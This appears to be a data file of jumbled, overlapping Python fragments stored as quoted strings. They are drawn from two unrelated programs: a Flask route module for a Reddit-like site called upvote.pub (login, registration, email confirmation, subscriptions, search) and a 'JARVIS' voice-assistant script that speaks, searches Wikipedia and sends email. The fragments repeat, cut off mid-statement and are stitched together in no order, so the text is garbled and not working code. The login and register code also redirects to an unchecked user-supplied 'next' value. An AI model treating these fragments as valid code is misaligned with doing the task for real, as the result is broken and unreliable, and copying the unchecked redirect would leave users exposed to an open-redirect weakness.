cur_subreddit=home_subreddit(),", "= markdown2.markdown(content, extras = ['fenced-code-blocks', 'nofollow', 'target-blank-links', 'toc', 'tables', 'footnotes',", "in the database user = User(username=form.username.data, email=form.email.data, \\ password=generate_password_hash(form.password.data), university=get_school(form.email.data),", "check_password_hash, generate_password_hash from logzero import logger from base import db,", "\"\"\" subreddit_list = Subreddit.query.all() form = None if g.user: if", "return thread_paginator @mod.route('/') def home(sort_type='hot'): \"\"\" If not trending we", "valid, but doesn't validate password is right if form.validate_on_submit(): #", "if user.email_token == token: user.email_verified = True db.session.commit() flash(\"Thank you", "can now submit and comment.\", 'success') return redirect(url_for('frontends.home')) @mod.route('/register/', methods=['GET',", "process_thread_paginator(trending=False, rs=None, subreddit=None, sort_type='hot'): \"\"\" abstracted because many sources pull", "\"\"\" if g.user: return redirect(url_for('frontends.home')) next = '' if request.method", "the user id session['user_id'] = user.id if 'next' in request.form", "do some extra work to route the user back to", "Insert the record in our database and commit it db.session.add(user)", "\"\"\" atom_url = url_for('subreddits.atom_feed', subreddit_name='frontpage', _external=True) trending = True if", "= rs.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator # sexy line of", "g.user: # If the user is logged in send them", "\"Frontpage\" thread_paginator = process_thread_paginator(trending=trending) return render_template('home.html', atom_url=atom_url, page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator)", "render_template('markdown.html', page=md, **md.metadata) @mod.route('/search/', methods=['GET']) def search(): \"\"\" Allows users", "search as search_module # don't override function name from base.users.forms", "subs logger.info(g.user) if g.user: subreddit_subs = g.user.subreddit_subs.get('subs') base_query = base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs))", "import requires_login from base.utils.user_utils import get_school from base.subreddits.forms import subreddit_subs,", "'toc', 'tables', 'footnotes', 'metadata', 'markdown-in-html']) return render_template('markdown.html', page=md, **md.metadata) @mod.route('/search/',", "request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) flash('Wrong email or password', 'danger')", "thread_paginator=thread_paginator) @mod.route('/.atom') @mod.route('/.xml') @mod.route('/.rss') def atom_redirect(): return redirect(url_for(\"subreddits.atom_feed\", subreddit_name=\"frontpage\")) @mod.route('/h/<string:page>')", "use werzeug to validate user's password if user and check_password_hash(user.password,", "if g.user: subreddit_subs = g.user.subreddit_subs.get('subs') base_query = base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs)) # Sorting", "@mod.route('/confirm-email/<string:token>') def confirm_email(token): \"\"\" Confirm user email \"\"\" user =", "True db.session.commit() flash(\"Thank you for confirming your email! You can", "subreddit_subs() for subreddit in subreddit_list: sform = sub_form() sform.sub_name =", "in form_subs if x['value']])) g.user.subreddit_subs = {'subs': form_subs} flash(\"Updated Subs\",", "is logged in send them home return redirect(url_for('frontends.home')) next =", "x['value']])) g.user.subreddit_subs = {'subs': form_subs} flash(\"Updated Subs\", 'success') db.session.commit() else:", "a list of defaults \"\"\" if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs')", "doesn't validate password is right if form.validate_on_submit(): # continue where", "it's a safe place to store the user id session['user_id']", "logout(): session.pop('user_id', None) return redirect(url_for('frontends.home')) @mod.route('/confirm-email/<string:token>') def confirm_email(token): \"\"\" Confirm", "list of defaults \"\"\" if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subreddits", "Log the user in, as he now has an id", "g.user: sform.value=subreddit.name in g.user.subreddit_subs['subs'] form.subs.append_entry(sform) return render_template('subreddits/subs.html', cur_subreddit=None, page_title='subs', form=form,", "subreddits = get_subreddits() return render_template('home.html', page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator, num_searches=num_searches) @mod.route('/login/',", "base_query = base_query.join(Publication).order_by(db.desc(Publication.pub_date)) thread_paginator = base_query.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator", "are just looking to # quickly paginate some arbitrary data,", "subreddit_subs, sub_form from base.utils.email import send_email from base.utils.misc import random_string,", "from flask import (Blueprint, request, render_template, flash, g, session, redirect,", "@mod.route('/h/<string:page>') def render_markdown(page): page_md = f\"base/markdown/{page}.md\" if not os.path.exists(page_md): abort(404)", "Please confirm your email by following the link sent in", "the session can't be modified as it's signed, # it's", "return render_template(\"register.html\", form=form, next=next) @mod.route('/subs/', methods=['GET', 'POST']) def view_all(): \"\"\"", "Blueprint('frontends', __name__, url_prefix='') @mod.before_request def before_request(): g.user = None if", "record in our database and commit it db.session.add(user) email_confirm_link =", "import get_school from base.subreddits.forms import subreddit_subs, sub_form from base.utils.email import", "we order by creation date \"\"\" atom_url = url_for('subreddits.atom_feed', subreddit_name='frontpage',", "cur_page = request.args.get('page') or 1 cur_page = int(cur_page) thread_paginator =", "form = subreddit_subs(request.form) if form.validate_on_submit(): form_subs = form.data.get('subs') form_subs =", "request.path.endswith('trending') else False page_title = \"Trending\" if trending else \"Frontpage\"", "base_query.order_by(db.desc(Thread.votes)) elif sort_type == 'comments': base_query = base_query.order_by(db.desc(Thread.n_comments)) elif sort_type", "etc) \"\"\" threads_per_page = 15 cur_page = request.args.get('page') or 1", "# it's a safe place to store the user id", "user.email) # Log the user in, as he now has", "coding: utf-8 -*- \"\"\" \"\"\" import os import markdown2 from", "base.subreddits.models import Subreddit from base.users.decorators import requires_login from base.utils.user_utils import", "override function name from base.users.forms import RegisterForm, LoginForm from base.users.models", "be modified as it's signed, # it's a safe place", "\\ password=generate_password_hash(form.password.data), university=get_school(form.email.data), email_token=random_string()) # Insert the record in our", "an id db.session.commit() session['user_id'] = user.id flash('Thanks for signing up!", "return render_template('markdown.html', page=md, **md.metadata) @mod.route('/search/', methods=['GET']) def search(): \"\"\" Allows", "subreddits otherwise fetch a list of defaults \"\"\" if g.get('user'):", "no sorting if rs: thread_paginator = rs.paginate(cur_page, per_page=threads_per_page, error_out=True) return", "if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) \\", "RegisterForm(request.form) if form.validate_on_submit(): # create an user instance not yet", "from base.utils.user_utils import get_school from base.subreddits.forms import subreddit_subs, sub_form from", "# don't override function name from base.users.forms import RegisterForm, LoginForm", "of defaults \"\"\" if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subreddits =", "Thread.query # Filter by user subs logger.info(g.user) if g.user: subreddit_subs", "g.user: if request.form: form = subreddit_subs(request.form) if form.validate_on_submit(): form_subs =", "subreddit_subs = g.user.subreddit_subs.get('subs') subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) \\ .filter(Subreddit.name.in_(subreddit_subs)) else:", "next = request.args['next'] form = LoginForm(request.form) # make sure data", "data is valid, but doesn't validate password is right if", "= User.query.filter_by(email_token=token).first() if user.email_token == token: user.email_verified = True db.session.commit()", "user and check_password_hash(user.password, form.password.data): # the session can't be modified", "methods=['GET', 'POST']) @requires_login def logout(): session.pop('user_id', None) return redirect(url_for('frontends.home')) @mod.route('/confirm-email/<string:token>')", "sort_type='hot'): \"\"\" abstracted because many sources pull from a thread", "= '' if request.method == 'GET': if 'next' in request.args:", "'top': base_query = base_query.order_by(db.desc(Thread.votes)) elif sort_type == 'comments': base_query =", "url_for, abort, Markup) from werkzeug import check_password_hash, generate_password_hash from logzero", "work to route the user back to his or her", "university=get_school(form.email.data), email_token=random_string()) # Insert the record in our database and", "before logging in \"\"\" if g.user: return redirect(url_for('frontends.home')) next =", "def process_thread_paginator(trending=False, rs=None, subreddit=None, sort_type='hot'): \"\"\" abstracted because many sources", "def register(): \"\"\" Registration page \"\"\" if g.user: # If", "if request.form: form = subreddit_subs(request.form) if form.validate_on_submit(): form_subs = form.data.get('subs')", "search_title=True, search_text=True) thread_paginator = process_thread_paginator(rs=rs) #rs = rs.all() num_searches =", "email! You can now submit and comment.\", 'success') return redirect(url_for('frontends.home'))", "sort_type == 'comments': base_query = base_query.order_by(db.desc(Thread.n_comments)) elif sort_type == 'new':", "= {'subs': form_subs} flash(\"Updated Subs\", 'success') db.session.commit() else: form =", "if form.validate_on_submit(): # create an user instance not yet stored", "def before_request(): g.user = None if session.get('user_id'): g.user = User.query.get(session['user_id'])", "it's signed, # it's a safe place to store the", "subreddit_list: sform = sub_form() sform.sub_name = subreddit.name sform.sub_group = subreddit.group", "flash(\"Updated Subs\", 'success') db.session.commit() else: form = subreddit_subs() for subreddit", "= True db.session.commit() flash(\"Thank you for confirming your email! You", "{'subs': form_subs} flash(\"Updated Subs\", 'success') db.session.commit() else: form = subreddit_subs()", "url_for('frontends.confirm_email', token = user.email_token) email_response = send_email(\"Confirm upvote.pub email\", \"\"\"Please", "'POST']) def view_all(): \"\"\" \"\"\" subreddit_list = Subreddit.query.all() form =", "= send_email(\"Confirm upvote.pub email\", \"\"\"Please visit the link below to", "\"\"\" Confirm user email \"\"\" user = User.query.filter_by(email_token=token).first() if user.email_token", "if user and check_password_hash(user.password, form.password.data): # the session can't be", "in send them home return redirect(url_for('frontends.home')) next = '' if", "subreddit in subreddit_list: sform = sub_form() sform.sub_name = subreddit.name sform.sub_group", "form.data.get('subs') form_subs = list(set([x['sub_name'] for x in form_subs if x['value']]))", "'publication_date': base_query = base_query.join(Publication).order_by(db.desc(Publication.pub_date)) thread_paginator = base_query.paginate(cur_page, per_page=threads_per_page, error_out=True) return", "we left off if so user = User.query.filter_by(email=form.email.data).first() # we", "user = User.query.filter_by(email_token=token).first() if user.email_token == token: user.email_verified = True", "base.users.forms import RegisterForm, LoginForm from base.users.models import User from base.threads.models", "elif sort_type == 'top': base_query = base_query.order_by(db.desc(Thread.votes)) elif sort_type ==", "def render_markdown(page): page_md = f\"base/markdown/{page}.md\" if not os.path.exists(page_md): abort(404) with", "in the confirmation email.', 'success') if 'next' in request.form and", "_external=True) trending = True if request.path.endswith('trending') else False page_title =", "RegisterForm, LoginForm from base.users.models import User from base.threads.models import Thread,", "had to do some extra work to route the user", "base_query = base_query.order_by(db.desc(Thread.n_comments)) elif sort_type == 'new': base_query = base_query.order_by(db.desc(Thread.created_on))", "email_response = send_email(\"Confirm upvote.pub email\", \"\"\"Please visit the link below", "your email! You can now submit and comment.\", 'success') return", "def get_subreddits(): \"\"\" Fetch user subreddits otherwise fetch a list", "thread_paginator=thread_paginator, num_searches=num_searches) @mod.route('/login/', methods=['GET', 'POST']) def login(): \"\"\" We had", "You can now submit and comment.\", 'success') return redirect(url_for('frontends.home')) @mod.route('/register/',", "passing in a resultset, that means we are just looking", "them home return redirect(url_for('frontends.home')) next = '' if request.method ==", "return redirect(url_for('frontends.home')) @mod.route('/register/', methods=['GET', 'POST']) def register(): \"\"\" Registration page", "base_query.order_by(db.desc(Thread.n_comments)) elif sort_type == 'new': base_query = base_query.order_by(db.desc(Thread.created_on)) elif sort_type", "form = RegisterForm(request.form) if form.validate_on_submit(): # create an user instance", "of code :) base_query = subreddit.threads if subreddit else Thread.query", "flask import (Blueprint, request, render_template, flash, g, session, redirect, url_for,", "= Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) return subs def get_subreddits(): \"\"\" Fetch user", "# make sure data is valid, but doesn't validate password", "= f\"base/markdown/{page}.md\" if not os.path.exists(page_md): abort(404) with open(page_md, 'r') as", "md = markdown2.markdown(content, extras = ['fenced-code-blocks', 'nofollow', 'target-blank-links', 'toc', 'tables',", "user id session['user_id'] = user.id if 'next' in request.form and", "validate_sort_type mod = Blueprint('frontends', __name__, url_prefix='') @mod.before_request def before_request(): g.user", "base.users.decorators import requires_login from base.utils.user_utils import get_school from base.subreddits.forms import", "render_template('home.html', page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator, num_searches=num_searches) @mod.route('/login/', methods=['GET', 'POST']) def login():", "many sources pull from a thread listing source (subreddit permalink,", "Default set of subreddits subreddits = Subreddit.query.all() return subreddits def", "request.args['next'] form = LoginForm(request.form) # make sure data is valid,", ".filter(Subreddit.name.in_(subreddit_subs)) else: subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) return subs def get_subreddits():", "\"\"\" Registration page \"\"\" if g.user: # If the user", "we use werzeug to validate user's password if user and", "the record in our database and commit it db.session.add(user) email_confirm_link", "random_string, validate_sort_type mod = Blueprint('frontends', __name__, url_prefix='') @mod.before_request def before_request():", "email=form.email.data, \\ password=generate_password_hash(form.password.data), university=get_school(form.email.data), email_token=random_string()) # Insert the record in", "# Insert the record in our database and commit it", "def confirm_email(token): \"\"\" Confirm user email \"\"\" user = User.query.filter_by(email_token=token).first()", "rs.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator # sexy line of code", "Thread, Publication from base.subreddits.models import Subreddit from base.users.decorators import requires_login", "not yet stored in the database user = User(username=form.username.data, email=form.email.data,", "= Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) \\ .filter(Subreddit.name.in_(subreddit_subs)) else: subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness))", "arbitrary data, no sorting if rs: thread_paginator = rs.paginate(cur_page, per_page=threads_per_page,", "f\"base/markdown/{page}.md\" if not os.path.exists(page_md): abort(404) with open(page_md, 'r') as f:", "markdown2.markdown(content, extras = ['fenced-code-blocks', 'nofollow', 'target-blank-links', 'toc', 'tables', 'footnotes', 'metadata',", "from logzero import logger from base import db, app from", "subreddit_subs(request.form) if form.validate_on_submit(): form_subs = form.data.get('subs') form_subs = list(set([x['sub_name'] for", "None if session.get('user_id'): g.user = User.query.get(session['user_id']) def home_subreddit(): logger.info(g.user) if", "base_query = subreddit.threads if subreddit else Thread.query # Filter by", "= subreddit.name sform.sub_group = subreddit.group if g.user: sform.value=subreddit.name in g.user.subreddit_subs['subs']", "= request.args['next'] form = LoginForm(request.form) # make sure data is", "= Blueprint('frontends', __name__, url_prefix='') @mod.before_request def before_request(): g.user = None", "thread_paginator # sexy line of code :) base_query = subreddit.threads", "form_subs = list(set([x['sub_name'] for x in form_subs if x['value']])) g.user.subreddit_subs", "Fetch user subreddits otherwise fetch a list of defaults \"\"\"", "redirect(url_for('frontends.home')) flash('Wrong email or password', 'danger') return render_template(\"login.html\", form=form, next=next)", "return redirect(url_for('frontends.home')) return render_template(\"register.html\", form=form, next=next) @mod.route('/subs/', methods=['GET', 'POST']) def", "to search threads and comments \"\"\" query = request.args.get('query') page_title=f\"Search", "def home_subreddit(): logger.info(g.user) if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subs =", "your email by following the link sent in the confirmation", "sform.sub_name = subreddit.name sform.sub_group = subreddit.group if g.user: sform.value=subreddit.name in", "following the link sent in the confirmation email.', 'success') if", "right if form.validate_on_submit(): # continue where we left off if", "= get_subreddits() return render_template('home.html', page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator, num_searches=num_searches) @mod.route('/login/', methods=['GET',", "= g.user.subreddit_subs.get('subs') base_query = base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs)) # Sorting if sort_type ==", "render_markdown(page): page_md = f\"base/markdown/{page}.md\" if not os.path.exists(page_md): abort(404) with open(page_md,", "the user back to his or her original place before", "sources pull from a thread listing source (subreddit permalink, homepage,", "email_token=random_string()) # Insert the record in our database and commit", "create an user instance not yet stored in the database", "if g.user: # If the user is logged in send", "rs = search_module.search(query, orderby='creation', search_title=True, search_text=True) thread_paginator = process_thread_paginator(rs=rs) #rs", "logger.info(g.user) if g.user: subreddit_subs = g.user.subreddit_subs.get('subs') base_query = base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs)) #", "trending we order by creation date \"\"\" atom_url = url_for('subreddits.atom_feed',", "Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) \\ .filter(Subreddit.name.in_(subreddit_subs)) else: subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) return", "elif sort_type == 'new': base_query = base_query.order_by(db.desc(Thread.created_on)) elif sort_type ==", "url_for('subreddits.atom_feed', subreddit_name='frontpage', _external=True) trending = True if request.path.endswith('trending') else False", "# we use werzeug to validate user's password if user", "= user.email_token) email_response = send_email(\"Confirm upvote.pub email\", \"\"\"Please visit the", "sort_type == 'top': base_query = base_query.order_by(db.desc(Thread.votes)) elif sort_type == 'comments':", "User.query.filter_by(email=form.email.data).first() # we use werzeug to validate user's password if", "thread_paginator = process_thread_paginator(trending=trending) return render_template('home.html', atom_url=atom_url, page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator) @mod.route('/.atom')", "cur_subreddit=home_subreddit(), thread_paginator=thread_paginator, num_searches=num_searches) @mod.route('/login/', methods=['GET', 'POST']) def login(): \"\"\" We", "by following the link sent in the confirmation email.', 'success')", "register(): \"\"\" Registration page \"\"\" if g.user: # If the", "methods=['GET', 'POST']) def view_all(): \"\"\" \"\"\" subreddit_list = Subreddit.query.all() form", "session can't be modified as it's signed, # it's a", "comment.\", 'success') return redirect(url_for('frontends.home')) @mod.route('/register/', methods=['GET', 'POST']) def register(): \"\"\"", "session['user_id'] = user.id if 'next' in request.form and request.form['next']: return", "User.query.filter_by(email_token=token).first() if user.email_token == token: user.email_verified = True db.session.commit() flash(\"Thank", "base_query.order_by(db.desc(Thread.hotness)) elif sort_type == 'top': base_query = base_query.order_by(db.desc(Thread.votes)) elif sort_type", "we are passing in a resultset, that means we are", "user = User(username=form.username.data, email=form.email.data, \\ password=generate_password_hash(form.password.data), university=get_school(form.email.data), email_token=random_string()) # Insert", "\"Trending\" if trending else \"Frontpage\" thread_paginator = process_thread_paginator(trending=trending) return render_template('home.html',", "methods=['GET', 'POST']) def login(): \"\"\" We had to do some", "'POST']) @requires_login def logout(): session.pop('user_id', None) return redirect(url_for('frontends.home')) @mod.route('/confirm-email/<string:token>') def", "\"\"\" user = User.query.filter_by(email_token=token).first() if user.email_token == token: user.email_verified =", "by creation date \"\"\" atom_url = url_for('subreddits.atom_feed', subreddit_name='frontpage', _external=True) trending", "the user in, as he now has an id db.session.commit()", "has an id db.session.commit() session['user_id'] = user.id flash('Thanks for signing", "'new': base_query = base_query.order_by(db.desc(Thread.created_on)) elif sort_type == 'publication_date': base_query =", "password if user and check_password_hash(user.password, form.password.data): # the session can't", "\"\"\" \"\"\" subreddit_list = Subreddit.query.all() form = None if g.user:", "redirect, url_for, abort, Markup) from werkzeug import check_password_hash, generate_password_hash from", "'tables', 'footnotes', 'metadata', 'markdown-in-html']) return render_template('markdown.html', page=md, **md.metadata) @mod.route('/search/', methods=['GET'])", "= int(cur_page) thread_paginator = None # if we are passing", "just looking to # quickly paginate some arbitrary data, no", "base.utils.misc import random_string, validate_sort_type mod = Blueprint('frontends', __name__, url_prefix='') @mod.before_request", "if trending else \"Frontpage\" thread_paginator = process_thread_paginator(trending=trending) return render_template('home.html', atom_url=atom_url,", "means we are just looking to # quickly paginate some", "User from base.threads.models import Thread, Publication from base.subreddits.models import Subreddit", "@mod.route('/') def home(sort_type='hot'): \"\"\" If not trending we order by", "and commit it db.session.add(user) email_confirm_link = url_for('frontends.confirm_email', token = user.email_token)", "user = User.query.filter_by(email=form.email.data).first() # we use werzeug to validate user's", "base.utils.user_utils import get_school from base.subreddits.forms import subreddit_subs, sub_form from base.utils.email", "= None # if we are passing in a resultset,", "redirect(url_for('frontends.home')) return render_template(\"register.html\", form=form, next=next) @mod.route('/subs/', methods=['GET', 'POST']) def view_all():", "Filter by user subs logger.info(g.user) if g.user: subreddit_subs = g.user.subreddit_subs.get('subs')", "Registration page \"\"\" if g.user: # If the user is", "if session.get('user_id'): g.user = User.query.get(session['user_id']) def home_subreddit(): logger.info(g.user) if g.get('user'):", "rs=None, subreddit=None, sort_type='hot'): \"\"\" abstracted because many sources pull from", "return subreddits def process_thread_paginator(trending=False, rs=None, subreddit=None, sort_type='hot'): \"\"\" abstracted because", "trending = True if request.path.endswith('trending') else False page_title = \"Trending\"", "in request.form and request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) return render_template(\"register.html\",", "Allows users to search threads and comments \"\"\" query =", "of subreddits subreddits = Subreddit.query.all() return subreddits def process_thread_paginator(trending=False, rs=None,", "and comment.\", 'success') return redirect(url_for('frontends.home')) @mod.route('/register/', methods=['GET', 'POST']) def register():", "atom_url = url_for('subreddits.atom_feed', subreddit_name='frontpage', _external=True) trending = True if request.path.endswith('trending')", "# Log the user in, as he now has an", "thread_paginator = base_query.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator @mod.route('/') def home(sort_type='hot'):", "email_confirm_link = url_for('frontends.confirm_email', token = user.email_token) email_response = send_email(\"Confirm upvote.pub", "from base.subreddits.models import Subreddit from base.users.decorators import requires_login from base.utils.user_utils", "sform.sub_group = subreddit.group if g.user: sform.value=subreddit.name in g.user.subreddit_subs['subs'] form.subs.append_entry(sform) return", "from base.utils.email import send_email from base.utils.misc import random_string, validate_sort_type mod", "if g.user: sform.value=subreddit.name in g.user.subreddit_subs['subs'] form.subs.append_entry(sform) return render_template('subreddits/subs.html', cur_subreddit=None, page_title='subs',", "= None if session.get('user_id'): g.user = User.query.get(session['user_id']) def home_subreddit(): logger.info(g.user)", "session.get('user_id'): g.user = User.query.get(session['user_id']) def home_subreddit(): logger.info(g.user) if g.get('user'): subreddit_subs", "= Subreddit.query.filter(Subreddit.name.in_(subreddit_subs)) else: # Default set of subreddits subreddits =", "error_out=True) return thread_paginator # sexy line of code :) base_query", "import markdown2 from flask import (Blueprint, request, render_template, flash, g,", ":) base_query = subreddit.threads if subreddit else Thread.query # Filter", "request.args: next = request.args['next'] form = RegisterForm(request.form) if form.validate_on_submit(): #", "render_template('home.html', atom_url=atom_url, page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator) @mod.route('/.atom') @mod.route('/.xml') @mod.route('/.rss') def atom_redirect():", "your email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"), email_confirm_link), user.email) # Log the user in, as", "in request.form and request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) flash('Wrong email", "upvote.pub email\", \"\"\"Please visit the link below to confirm your" ]
[ "= pyttsx3.init('sapi5') voices = engine.getProperty('voices') engine.setProperty('voice', voices[0].id) # To change", "\"play music\" in query: music_dir = \"D:\\\\vijayesh\\\\music\" songs = os.listdir(music_dir)", "more increase sentence to decrease sentence decreease sentence speak(\"According to", "#print(e) print(\"Say that again please\") return \"None\" return query def", ">= 12 and hour < 18: speak(\"Good afternoon\") else: speak(\"Good", "query = r.recognize_google(audio,language='en-in') print(f'user said : {query}\\n') except Exception as", "results = wikipedia.summary(query,sentences=2)#To read more increase sentence to decrease sentence", "return query def sendEmail(to,content): server =smtplib.SMTP('smtp.gmail.com',28) # server.connect(\"smtp.gmail.com\",465) # server.ehlo()", "try: speak(\"What should i say\")#error present content = take_command() to", "def take_command(): \"\"\" It takes microphone input from the user", "night\") speak(\"I am JARVIS how can i help you\") if", "if 'wikipedia' in query: speak(\"Searching wikipedia\") query = query.replace('wikipedia','') results", "speak(results) elif 'open youtube' in query: # webbrowser.Chrome.open_new(\"youtube.com\") webbrowser.open(\"youtube.com\") elif", "wikipedia\") #print(results) speak(results) elif 'open youtube' in query: # webbrowser.Chrome.open_new(\"youtube.com\")", "Exception as e: #print(e) print(\"Say that again please\") return \"None\"", "hour = int(datetime.datetime.now().hour) if hour >= 0 and hour <", "user and returns a string :return: \"\"\" r = sr.Recognizer()", "18: speak(\"Good afternoon\") else: speak(\"Good night\") speak(\"I am JARVIS how", "time\" in query: strtime = datetime.datetime.now().strftime(\"%H:%M:%S\") speak(f\"The time is {strtime}\")", "elif \" open pycharm\" in query: pycharmpath =\"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community", "os import smtplib engine = pyttsx3.init('sapi5') voices = engine.getProperty('voices') engine.setProperty('voice',", "webbrowser.open(\"google.com\") elif \"play music\" in query: music_dir = \"D:\\\\vijayesh\\\\music\" songs", "i say\")#error present content = take_command() to = \"<EMAIL>\" sendEmail(to,content)", "2021\" os.startfile(pycharmpath) #elif \"open command\" in query: # filelocation =", "engine.getProperty('voices') engine.setProperty('voice', voices[0].id) # To change the voice to female", "female change 0 to 1. def speak(audio): engine.say(audio) engine.runAndWait() pass", "takes microphone input from the user and returns a string", "wikipedia.summary(query,sentences=2)#To read more increase sentence to decrease sentence decreease sentence", "query = query.replace('wikipedia','') results = wikipedia.summary(query,sentences=2)#To read more increase sentence", "1.5 seconds to complete a sentence audio = r.listen(source) #Do", "sentence audio = r.listen(source) #Do read details try: print(\"Recognizing\") query", "= \"<EMAIL>\" sendEmail(to,content) speak(\"Email has been sent\") exit() except Exception", "speak(\"What should i say\")#error present content = take_command() to =", "change 0 to 1. def speak(audio): engine.say(audio) engine.runAndWait() pass def", "# server.connect(\"smtp.gmail.com\",465) # server.ehlo() server.login('<EMAIL>','########') server.sendmail('<EMAIL>',to,content) server.close() def wish_me(): hour", "decrease sentence decreease sentence speak(\"According to wikipedia\") #print(results) speak(results) elif", "import speech_recognition as sr import wikipedia import webbrowser import os", "# server.ehlo() server.login('<EMAIL>','########') server.sendmail('<EMAIL>',to,content) server.close() def wish_me(): hour = int(datetime.datetime.now().hour)", "= int(datetime.datetime.now().hour) if hour >= 0 and hour < 12:", "1. def speak(audio): engine.say(audio) engine.runAndWait() pass def take_command(): \"\"\" It", "to = \"<EMAIL>\" sendEmail(to,content) speak(\"Email has been sent\") exit() except", "hour >= 0 and hour < 12: speak(\"Good morning\") elif", "{query}\\n') except Exception as e: #print(e) print(\"Say that again please\")", "speak(\"Good morning\") elif hour >= 12 and hour < 18:", "print(\"Listening...\") r.pause_threshold = 1.5 # It will wait 1.5 seconds", "\"\"\" It takes microphone input from the user and returns", "music_dir = \"D:\\\\vijayesh\\\\music\" songs = os.listdir(music_dir) print(songs) os.startfile(os.path.join(music_dir,songs[1])) elif \"the", "def speak(audio): engine.say(audio) engine.runAndWait() pass def take_command(): \"\"\" It takes", "wikipedia\") query = query.replace('wikipedia','') results = wikipedia.summary(query,sentences=2)#To read more increase", "\"path of the particular file like above\" # os.startfile(filelocation) elif", "been sent\") exit() except Exception as e: print(e) speak(\"Sorry,I am", "\"open google\" in query: webbrowser.open(\"google.com\") elif \"play music\" in query:", "microphone input from the user and returns a string :return:", "change the voice to female change 0 to 1. def", "in query: strtime = datetime.datetime.now().strftime(\"%H:%M:%S\") speak(f\"The time is {strtime}\") elif", "print(f'user said : {query}\\n') except Exception as e: #print(e) print(\"Say", "os.startfile(pycharmpath) #elif \"open command\" in query: # filelocation = \"path", "particular file like above\" # os.startfile(filelocation) elif \" email to", "= engine.getProperty('voices') engine.setProperty('voice', voices[0].id) # To change the voice to", "\"the time\" in query: strtime = datetime.datetime.now().strftime(\"%H:%M:%S\") speak(f\"The time is", "read details try: print(\"Recognizing\") query = r.recognize_google(audio,language='en-in') print(f'user said :", "with sr.Microphone() as source: print(\"Listening...\") r.pause_threshold = 1.5 # It", "am JARVIS how can i help you\") if __name__ ==", "returns a string :return: \"\"\" r = sr.Recognizer() with sr.Microphone()", "server.login('<EMAIL>','########') server.sendmail('<EMAIL>',to,content) server.close() def wish_me(): hour = int(datetime.datetime.now().hour) if hour", "speak(f\"The time is {strtime}\") elif \" open pycharm\" in query:", "Exception as e: print(e) speak(\"Sorry,I am not able to send", "print(e) speak(\"Sorry,I am not able to send this email\") exit()", "engine.say(audio) engine.runAndWait() pass def take_command(): \"\"\" It takes microphone input", "i help you\") if __name__ == '__main__': wish_me() while True:", "details try: print(\"Recognizing\") query = r.recognize_google(audio,language='en-in') print(f'user said : {query}\\n')", "as e: #print(e) print(\"Say that again please\") return \"None\" return", "open pycharm\" in query: pycharmpath =\"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition 2021\"", "you\") if __name__ == '__main__': wish_me() while True: query =take_command().lower()", "import smtplib engine = pyttsx3.init('sapi5') voices = engine.getProperty('voices') engine.setProperty('voice', voices[0].id)", "1.5 # It will wait 1.5 seconds to complete a", "def wish_me(): hour = int(datetime.datetime.now().hour) if hour >= 0 and", "and hour < 12: speak(\"Good morning\") elif hour >= 12", "speech_recognition as sr import wikipedia import webbrowser import os import", "wish_me(): hour = int(datetime.datetime.now().hour) if hour >= 0 and hour", "smtplib engine = pyttsx3.init('sapi5') voices = engine.getProperty('voices') engine.setProperty('voice', voices[0].id) #", "morning\") elif hour >= 12 and hour < 18: speak(\"Good", "=take_command().lower() if 'wikipedia' in query: speak(\"Searching wikipedia\") query = query.replace('wikipedia','')", "'wikipedia' in query: speak(\"Searching wikipedia\") query = query.replace('wikipedia','') results =", "speak(\"Searching wikipedia\") query = query.replace('wikipedia','') results = wikipedia.summary(query,sentences=2)#To read more", "as e: print(e) speak(\"Sorry,I am not able to send this", "voices = engine.getProperty('voices') engine.setProperty('voice', voices[0].id) # To change the voice", "elif \" email to vijayesh\" or \"email to vijesh\" in", "query: webbrowser.open(\"google.com\") elif \"play music\" in query: music_dir = \"D:\\\\vijayesh\\\\music\"", "afternoon\") else: speak(\"Good night\") speak(\"I am JARVIS how can i", "print(\"Recognizing\") query = r.recognize_google(audio,language='en-in') print(f'user said : {query}\\n') except Exception", "{strtime}\") elif \" open pycharm\" in query: pycharmpath =\"C:\\\\Program Files\\\\JetBrains\\\\PyCharm", "== '__main__': wish_me() while True: query =take_command().lower() if 'wikipedia' in", "def sendEmail(to,content): server =smtplib.SMTP('smtp.gmail.com',28) # server.connect(\"smtp.gmail.com\",465) # server.ehlo() server.login('<EMAIL>','########') server.sendmail('<EMAIL>',to,content)", "will wait 1.5 seconds to complete a sentence audio =", "= 1.5 # It will wait 1.5 seconds to complete", "int(datetime.datetime.now().hour) if hour >= 0 and hour < 12: speak(\"Good", "seconds to complete a sentence audio = r.listen(source) #Do read", 